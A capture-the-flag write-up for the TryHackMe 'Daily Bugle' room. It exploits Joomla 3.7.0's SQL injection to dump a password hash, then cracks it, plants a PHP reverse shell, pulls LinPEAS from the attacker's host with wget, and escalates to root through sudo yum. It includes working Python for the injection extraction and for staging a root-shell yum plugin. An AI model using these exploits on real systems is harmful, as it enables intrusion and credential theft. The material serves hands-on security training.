TryHackMe: Daily Bugle (OSCP approved tools)
This Hard TryHackMe room hosts a website built on the Joomla Content Management System. The Joomla version in use is vulnerable to a public exploit that leaks a password hash from its database. We crack that hash with John the Ripper, use the recovered password to get a shell, and then escalate our privileges with the help of LinPEAS.
Tools:
- Public Python Script
- John the Ripper
- LinPEAS.sh
First, we start with a basic nmap scan, which shows SSH, HTTP, and a SQL database port open.
- -vv flag: very verbose. Good for being able to see status and progress.
- -Pn flag: tells nmap to skip host discovery and treat the target as up. We know the server is up, and it may not respond to pings.
nmap -vv -Pn 10.10.52.102

First, we will look at the web server running on port 80 by navigating to http://10.10.52.102 in a web browser. Some enumeration indicates the site is using the Joomla CMS. To determine which version is running, we can request Joomla's own manifest file at the following path: /administrator/manifests/files/joomla.xml.

Now that we know we are working with Joomla version 3.7.0, we can research publicly available exploits for this version and discover that it is vulnerable to an unauthenticated SQL injection (CVE-2017-8917). Instead of using SQLMap (not allowed on the OSCP exam), I decided to use a Python script named joomblah.py:
https://github.com/stefanlucas/Exploit-Joomla
This script is easy to use; all you have to provide is the URL. (Note: run it with Python 2, or you will receive errors.) It dumps the users table from the Joomla database, which gives us the username jonah and his bcrypt password hash:
python2 joomblah.py http://10.10.52.102
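To show what the script is doing under the hood, here is an added example (not the page's or joomblah.py's own code) that re-implements the CVE-2017-8917 error-based injection: the com_fields modal list takes the list[fullordering] parameter unescaped, so wrapping a subquery in updatexml() makes MySQL echo its result inside an XPath error message. Because that message is capped at 32 characters, the extraction loop pulls the result out in 31-character chunks. The target URL, the xyz_ table prefix, the user row and the hash are all constructed for the offline demo; the fake_fetch() function stands in for the vulnerable server, and a real run would replace it with an HTTP GET.

```python
import re
import urllib.parse
from typing import Callable, Optional

# CVE-2017-8917: in Joomla 3.7.0 the com_fields component passes the
# list[fullordering] request parameter into an ORDER BY clause unescaped,
# so an unauthenticated visitor can inject SQL through the modal field list.
INJECT_PATH = "index.php"
BASE_PARAMS = {"option": "com_fields", "view": "fields", "layout": "modal"}
# MySQL echoes the bad XPath expression back in the error page.
ERROR_RE = re.compile(r"XPATH syntax error: '~(.*?)'", re.S)
# updatexml() truncates the echoed text to 32 chars; one is our '~' marker.
CHUNK = 31


def build_url(base: str, query: str) -> str:
    """Wrap a scalar subquery in updatexml() so its result leaks via an error."""
    inj = f"updatexml(0x23,concat(0x7e,({query})),1)"  # 0x7e is '~'
    params = dict(BASE_PARAMS, **{"list[fullordering]": inj})
    return f"{base.rstrip('/')}/{INJECT_PATH}?{urllib.parse.urlencode(params)}"


def parse_leak(html: str) -> Optional[str]:
    """Pull the leaked text out of the MySQL XPath error, or None if absent."""
    m = ERROR_RE.search(html)
    return m.group(1) if m else None


def extract(base: str, query: str, fetch: Callable[[str], str]) -> str:
    """Leak the full result of `query` 31 characters at a time."""
    out = ""
    while True:
        offset = len(out) + 1
        chunk_query = f"select substring(({query}),{offset},{CHUNK})"
        piece = parse_leak(fetch(build_url(base, chunk_query)))
        if not piece:
            break
        out += piece
        if len(piece) < CHUNK:  # a short chunk means we reached the end
            break
    return out


# --- constructed, offline stand-in for the vulnerable server ---------------
# The user row and bcrypt hash below are made up, not data from the room.
SAMPLE_ROW = "jonah:$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
# Joomla's table prefix is per-install; 'xyz_' is an assumption here (the
# public script reads the real prefix from information_schema first).
USERS_QUERY = "select concat(username,0x3a,password) from xyz_users limit 1"


def fake_fetch(url: str) -> str:
    """Behave like MySQL: return the substring the injected query asked for."""
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    inj = qs["list[fullordering]"][0]
    m = re.search(r"substring\(\(.*?\),(\d+),(\d+)\)", inj)
    off, ln = int(m.group(1)), int(m.group(2))
    piece = SAMPLE_ROW[off - 1 : off - 1 + ln]
    if not piece:
        return "<html><body>No items found.</body></html>"
    return f"<html><body>500 - XPATH syntax error: '~{piece}'</body></html>"


if __name__ == "__main__":
    target = "http://10.10.52.102"  # room IP from the write-up; any host works
    print(build_url(target, USERS_QUERY))
    print(extract(target, USERS_QUERY, fake_fetch))
```

Against a live target you would pass a fetch function that performs the GET (for example with urllib or requests) and returns the response body; everything else stays the same. The chunked loop is the part worth understanding: a single updatexml() error would only ever show the first 31 characters of a 60-character bcrypt hash.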

Now that we have a hash, we need to crack it using John the Ripper. First, we need to identify the hash type: Joomla 3.x stores passwords as bcrypt, and the $2y$ prefix on the hash confirms it, so we tell John to use the bcrypt format. Save the hash to a file (here jonahHash) and run:
john jonahHash --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

A few minutes later, John cracked the password. Now we need to find where to use it. Trying the username and password over SSH did not work (testing for password reuse), so we pivot to logging into the Joomla admin panel, since the credentials came from the Joomla database. Navigating to http://10.10.52.102/administrator/ shows the admin login page. Using Jonah's creds, we can log in. After looking around, we can see that the Templates section lets us edit the PHP files of the site's templates.

I opened one of the template's PHP files, replaced its contents with Pen Test Monkey's PHP reverse shell, and saved the file. https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php (Note: change the IP and port in the script to match your listener before you save it.)
Start a netcat listener with nc -nlvp 1234, then browse to the index.php page that loads the edited template. You will get a callback to your listener running as the apache user.

Now that we have our initial shell, we need to move laterally to another user, jjameson, whom we can find by listing the home directories with ls /home/.
First, we will get linpeas.sh onto the system using wget. On your local machine, host a Python simple HTTP server from the directory that contains linpeas.sh (python3 -m http.server). Since we are running as the apache user, we most likely have read, write, and execute permissions on the /var/www/html directory, so we will save linpeas.sh there (a world-writable location such as /tmp or /dev/shm works as well):
wget http://10.9.201.84:8000/linpeas.sh
chmod +x linpeas.sh

Now we can run the script with ./linpeas.sh. After some output, we see some interesting things. Most importantly, LinPEAS reports a password inside a PHP config file: Joomla's configuration.php, which stores the database credentials in plain text.

We try this new password to SSH into the system as jjameson (password reuse between the database and a local account), and we are able to log in and read the user.txt file.

Now we need to escalate to root. We run linpeas.sh again, this time as jjameson, and give it jjameson's password so it can check sudo permissions; we can reuse the copy already at /var/www/html/linpeas.sh. (The same information is available directly with sudo -l.) A new finding jumps out: jjameson can run yum with sudo.

Now, using GTFOBins, we can look up the commands for escalating privileges through yum: yum accepts an attacker-supplied configuration file, that configuration can point yum at an attacker-controlled plugin directory, and the plugin's code runs as root when yum loads it.

A copy and paste of these commands gives us a root shell.
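The mechanism behind the GTFOBins commands, as an added example that is not the page's or GTFOBins' own code: the stager below writes the three files the technique needs (a yum config whose pluginpath and pluginconfpath point at a directory we own, a plugin config that enables the plugin, and the plugin itself, whose init_hook exec's a shell) and returns the sudo command that makes yum load them as root. The plugin follows the classic yum plugin API (requires_api_version and init_hook), which is what the CentOS yum in this room uses; dnf does not load these plugins. The working directory is created with mkdtemp, and the command is printed rather than executed, so the only assumption is that you run it on the target as jjameson.

```python
import os
import tempfile
import textwrap

# GTFOBins 'yum' technique: yum honours -c <config> and loads plugins from the
# pluginpath named in that config, so a user who can 'sudo yum' gets arbitrary
# Python executed as root from the plugin's init_hook.

# yum config pointing both plugin paths at a directory we control.
YUM_CONF = textwrap.dedent("""\
    [main]
    plugins=1
    pluginpath={d}
    pluginconfpath={d}
    """)

# Per-plugin config file: <name>.conf must exist and enable the plugin.
PLUGIN_CONF = "[main]\nenabled=1\n"

# Minimal classic yum (Python 2) plugin: yum checks requires_api_version and
# then calls init_hook() before doing any work, still running as root.
PLUGIN_PY = textwrap.dedent("""\
    import os
    import yum
    from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
    requires_api_version = '2.1'

    def init_hook(conduit):
        os.execl('/bin/sh', '/bin/sh')
    """)


def stage_yum_plugin(workdir: str) -> str:
    """Write config and plugin into workdir; return the command to run as root."""
    files = {
        "x": YUM_CONF.format(d=workdir),  # config passed with -c
        "y.conf": PLUGIN_CONF,            # enables the plugin named 'y'
        "y.py": PLUGIN_PY,                # plugin module yum will import
    }
    for name, body in files.items():
        with open(os.path.join(workdir, name), "w") as fh:
            fh.write(body)
    return f"sudo yum -c {workdir}/x --enableplugin=y"


def stage_in_tempdir() -> tuple:
    """Create a fresh private directory and stage the plugin in it."""
    workdir = tempfile.mkdtemp()
    return workdir, stage_yum_plugin(workdir)


if __name__ == "__main__":
    workdir, command = stage_in_tempdir()
    print(f"staged in {workdir}")
    print(command)  # run this on the target; the shell it drops into is root
```

The interesting detail for a defender is that nothing here touches the system's real yum configuration: the whole attack lives in a temporary directory and in the -c and --enableplugin arguments, so a sudo rule that allows yum unrestricted is equivalent to granting a root shell.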

Now we can cat the root.txt flag and the room is complete!
